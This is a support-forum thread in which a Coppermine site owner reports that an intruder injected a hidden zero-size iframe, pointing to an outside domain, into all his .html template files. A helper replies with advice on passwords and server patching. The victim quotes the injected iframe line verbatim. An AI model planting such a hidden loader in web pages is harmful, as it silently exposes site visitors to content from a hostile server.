Help - My Coppermine Site Got Hacked! Help - My Coppermine Site Got Hacked!
 

News:

CPG Release 1.6.27
change DB IP storage fields to accommodate IPv6 addresses
remove use of E_STRICT (PHP 8.4 deprecated)
update README to reflect new website
align code with new .com CPG website
correct deprecation in captcha

Main Menu

Help - My Coppermine Site Got Hacked!

Started by caplan8293, November 15, 2004, 07:03:17 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

caplan8293

November 15, 2004, 07:03:17 AM
Has anyone ever heard of this?  Someone hacked into my webserving account and edited the template.html's of my 30+ themes and added the line
Code Select
<Iframe Src="http://2awm.com/pop/get.php?user=tt1sp" width=0 height=0></Iframe>
to each one.  Since there are so many themes, I think it must have been done programatically.  However, how would the hacker or program know only to edit template.html?  None of my other files on my whole website were touched... Any ideas?
Thanks a lot.
Chuck
caplan8293

caplan8293

#1
November 15, 2004, 07:15:43 AM
UPDATE - It is not just a Coppermine thing.  Apparently someone hacked into my site and ran a PERL script to add the above code to all files ending in .html.  That is why all my Coppermine files were affected.  Still, if anyone has any experience with getting hacked this way, I would like to hear about what they did.
Thanks
caplan8293

Joachim Müller

#2
November 15, 2004, 07:49:14 AM
mostly such intruders get in because the site admin uses a weak password (trivial password, with too few characters). Change your password immediately, and contact your webhost for support, maybe the intruder was using an exploit from an unpatched weakness on the server itself.

You are correct, this is not a coppermine thing at all.

Joachim
Print
Go Up Pages1
User actions